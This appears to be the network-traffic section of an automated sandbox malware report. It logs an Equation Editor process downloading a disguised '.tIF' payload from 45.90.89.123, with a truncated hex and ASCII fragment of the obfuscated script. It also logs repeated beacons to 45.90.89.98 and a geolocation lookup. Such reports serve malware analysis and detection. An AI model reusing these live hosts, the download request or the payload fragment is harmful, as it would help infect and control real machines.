                                                Sep 11, 2024 20:22:25.395898104 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395915985 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395922899 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395929098 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395940065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395951033 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395962000 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.395963907 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395977020 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.395993948 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.396018028 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.396155119 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.396166086 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.396178961 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.396202087 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.399063110 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399075985 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399085999 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399131060 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.399691105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399703026 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399714947 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399781942 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399792910 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399802923 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399816036 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399869919 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.399869919 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.399869919 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.399921894 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399933100 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399943113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399955034 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399966955 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399972916 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.399977922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399990082 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.399995089 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400017023 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400038958 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400077105 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400177002 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400188923 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400199890 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400212049 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400223017 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400223970 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400233984 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400245905 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400249958 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400258064 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400274992 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400294065 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.400376081 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400387049 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400398016 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.400422096 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.401614904 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447210073 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447237968 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447251081 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447263002 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447274923 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447285891 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447305918 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447300911 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447318077 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447329044 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447335005 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447340965 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447351933 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447352886 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447365999 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447371006 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447400093 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447413921 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447424889 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447458982 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447527885 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447540045 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447550058 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447561979 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447566986 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447573900 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447586060 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447597980 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.447598934 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.447621107 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.485397100 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485439062 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485450983 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.485455036 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485479116 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485491991 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485495090 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.485505104 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485517025 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.485531092 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.485531092 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486037970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486063957 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486078024 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486083984 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486095905 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486130953 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486196995 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486207962 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486221075 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486226082 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486232042 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486248970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486273050 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486335993 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486346960 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486357927 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486371040 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486377954 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486383915 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486397028 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486406088 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486408949 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486433983 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486591101 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486602068 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486613035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486634970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486634970 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486649036 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486664057 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486673117 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486675978 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486695051 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486768007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486783981 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486798048 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486809969 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486809969 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486824989 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486840010 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486861944 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486891985 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486911058 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486931086 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486944914 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486949921 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.486958027 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.486979961 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487140894 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487153053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487171888 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487176895 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487185001 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487196922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487205029 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487210035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487221956 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487231016 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487235069 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487247944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487257004 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487262011 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487273932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487283945 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487287045 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487306118 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487329960 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487488985 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487500906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487513065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487519979 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487554073 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487603903 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487616062 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487627983 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487639904 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487648964 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487673044 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487804890 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487817049 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487828970 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487840891 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487847090 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487853050 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487864017 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487870932 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487876892 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487889051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487896919 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.487900972 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.487920046 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.488058090 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488092899 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.488142014 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488153934 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488159895 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488172054 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488184929 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.488185883 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.488205910 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.618767977 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.664041042 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:25.670087099 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:25.670146942 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:25.677912951 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:25.682806969 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.654961109 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.656100035 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.656143904 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.656157017 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.656193972 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.661569118 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.666390896 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:29.666452885 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:29.671303034 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.415330887 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.417376041 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:30.422369957 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.602988005 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.755261898 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:30.760199070 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:30.760271072 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:30.763412952 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:30.768223047 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:30.812222958 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:30.812330008 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:31.382930040 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:31.383018017 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:31.432928085 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:31.438327074 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:32.650635004 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:32.650971889 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:32.651493073 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:22:32.651535034 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:22:44.106367111 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:44.108064890 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:22:44.108127117 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:44.108241081 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:22:44.113409042 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:13.858422041 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:13.863907099 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:23:13.868984938 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:33.288666964 CEST4916580192.168.2.22178.237.33.50
                                                Sep 11, 2024 20:23:33.293889999 CEST8049165178.237.33.50192.168.2.22
                                                Sep 11, 2024 20:23:43.858776093 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:23:43.860035896 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:23:43.865004063 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:13.859030008 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:13.860263109 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:24:13.865226984 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:44.050715923 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:24:44.052087069 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:24:44.061328888 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:14.255348921 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:14.256251097 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:14.256313086 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:25:14.256804943 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:25:14.263262033 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:43.891535044 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:25:43.893737078 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:25:43.898736000 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:26:13.906234026 CEST82434916445.90.89.98192.168.2.22
                                                Sep 11, 2024 20:26:13.914196968 CEST491648243192.168.2.2245.90.89.98
                                                Sep 11, 2024 20:26:13.919078112 CEST82434916445.90.89.98192.168.2.22

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 11, 2024 20:22:20.641999960 CEST5456253192.168.2.228.8.8.8
                                                Sep 11, 2024 20:22:20.652302980 CEST53545628.8.8.8192.168.2.22
                                                Sep 11, 2024 20:22:30.736854076 CEST5291753192.168.2.228.8.8.8
                                                Sep 11, 2024 20:22:30.746052980 CEST53529178.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Sep 11, 2024 20:22:20.641999960 CEST192.168.2.228.8.8.80xaccaStandard query (0)ia601706.us.archive.orgA (IP address)IN (0x0001)false
                                                Sep 11, 2024 20:22:30.736854076 CEST192.168.2.228.8.8.80x5bedStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 11, 2024 20:22:20.652302980 CEST8.8.8.8192.168.2.220xaccaNo error (0)ia601706.us.archive.org207.241.227.96A (IP address)IN (0x0001)false
                                                Sep 11, 2024 20:22:30.746052980 CEST8.8.8.8192.168.2.220x5bedNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • ia601706.us.archive.org
                                                • 45.90.89.123
                                                • geoplugin.net

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.224916145.90.89.123803340C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                TimestampBytes transferredDirectionData
                                                Sep 11, 2024 20:22:15.616658926 CEST343OUTGET /421/seennewthingsentireworldseethethings.tIF HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                Host: 45.90.89.123
                                                Connection: Keep-Alive
                                                Sep 11, 2024 20:22:16.372056961 CEST1236INHTTP/1.1 200 OK
                                                Date: Wed, 11 Sep 2024 18:22:16 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                Last-Modified: Tue, 10 Sep 2024 10:55:32 GMT
                                                ETag: "312a2-621c1b666d2a6"
                                                Accept-Ranges: bytes
                                                Content-Length: 201378
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: image/tiff
                                                Data Raw: ff fe 4c 00 4c 00 62 00 5a 00 75 00 69 00 6b 00 69 00 52 00 4c 00 65 00 41 00 68 00 20 00 3d 00 20 00 22 00 7a 00 57 00 4c 00 64 00 52 00 66 00 4f 00 69 00 4c 00 69 00 68 00 47 00 51 00 22 00 0d 00 0a 00 66 00 78 00 57 00 6b 00 41 00 57 00 41 00 70 00 49 00 6b 00 57 00 47 00 70 00 20 00 3d 00 20 00 22 00 6f 00 4e 00 70 00 4b 00 62 00 65 00 62 00 74 00 67 00 6d 00 6b 00 4c 00 74 00 22 00 0d 00 0a 00 62 00 7a 00 70 00 6f 00 65 00 43 00 6b 00 75 00 4f 00 57 00 54 00 4a 00 42 00 20 00 3d 00 20 00 22 00 41 00 6c 00 4b 00 4c 00 63 00 4e 00 53 00 50 00 57 00 6e 00 4c 00 6d 00 75 00 22 00 0d 00 0a 00 4c 00 6b 00 55 00 70 00 62 00 65 00 6e 00 41 00 75 00 5a 00 52 00 7a 00 61 00 20 00 3d 00 20 00 22 00 70 00 4b 00 6c 00 68 00 4b 00 68 00 4c 00 55 00 6e 00 73 00 62 00 62 00 69 00 22 00 0d 00 0a 00 70 00 52 00 70 00 74 00 62 00 4c 00 41 00 4c 00 70 00 5a 00 66 00 4c 00 66 00 20 00 3d 00 20 00 22 00 47 00 55 00 48 00 48 00 61 00 54 00 47 00 4c 00 52 00 4b 00 47 00 67 00 55 00 22 00 0d 00 0a 00 6d 00 41 00 57 00 [TRUNCATED]
                                                Data Ascii: LLbZuikiRLeAh = "zWLdRfOiLihGQ"fxWkAWApIkWGp = "oNpKbebtgmkLt"bzpoeCkuOWTJB = "AlKLcNSPWnLmu"LkUpbenAuZRza = "pKlhKhLUnsbbi"pRptbLALpZfLf = "GUHHaTGLRKGgU"mAWZLijNANWcW = "WknhWcWKuLbqP"GGiZCfnpRofotaj = "piGWuKtGWfLWW"ZWNBZigfkgWOA = "ZkWWHdLLxTiUi"ePALJvLQWKAUj = "fKGUthKsBCbmL"ULcWLTZUkWNKn = "zaWLhndULhLit"WuGaicLNfKZpL = "bpoKiKchNAbcR"bHGgLRGPudtiO = "hcWKxGbdGLZoB"JhdUulLNseTWL = "otCULLLiGZQZI"SWNHeiNhoneWK = "SchKCvOGtQ
                                                Sep 11, 2024 20:22:16.372076988 CEST224INData Raw: 00 6b 00 54 00 4b 00 22 00 0d 00 0a 00 48 00 42 00 42 00 63 00 4f 00 69 00 54 00 68 00 75 00 4e 00 51 00 4c 00 66 00 20 00 3d 00 20 00 22 00 62 00 6b 00 5a 00 66 00 6f 00 64 00 4b 00 70 00 71 00 6b 00 70 00 41 00 57 00 22 00 0d 00 0a 00 4c 00 47
                                                Data Ascii: kTK"HBBcOiThuNQLf = "bkZfodKpqkpAW"LGWLKbLbkNmSL = "LWkKLKpLboWKp"PLUGLWjiomTdW = "LLvLhpcWRLkKx"zWGadhZ
                                                Sep 11, 2024 20:22:16.372087002 CEST1236INData Raw: 00 4f 00 42 00 63 00 55 00 4f 00 6c 00 20 00 3d 00 20 00 22 00 49 00 47 00 62 00 57 00 4c 00 4c 00 65 00 67 00 6d 00 43 00 61 00 43 00 51 00 22 00 0d 00 0a 00 41 00 4e 00 61 00 55 00 57 00 69 00 41 00 41 00 41 00 4b 00 6b 00 47 00 55 00 20 00 3d
                                                Data Ascii: OBcUOl = "IGbWLLegmCaCQ"ANaUWiAAAKkGU = "KGZKiZlPbvoWp"LLcLrJeiQJzBP = "gKZAfAKRKtbJi"NAbGkPCpGGLin = "QxWctinUdZ
                                                Sep 11, 2024 20:22:16.372117996 CEST1236INData Raw: 00 50 00 63 00 47 00 55 00 6f 00 22 00 0d 00 0a 00 62 00 57 00 55 00 42 00 57 00 4f 00 55 00 57 00 57 00 6f 00 47 00 50 00 68 00 20 00 3d 00 20 00 22 00 6b 00 67 00 61 00 57 00 69 00 7a 00 43 00 6f 00 43 00 5a 00 47 00 52 00 68 00 22 00 0d 00 0a
                                                Data Ascii: PcGUo"bWUBWOUWWoGPh = "kgaWizCoCZGRh"AkWAkKJiGWlbK = "ZdclWbmLUmiuU"WKnWpKLmGuLLz = "GKUIpKknstuGp"bmKRbtLbcNuCP
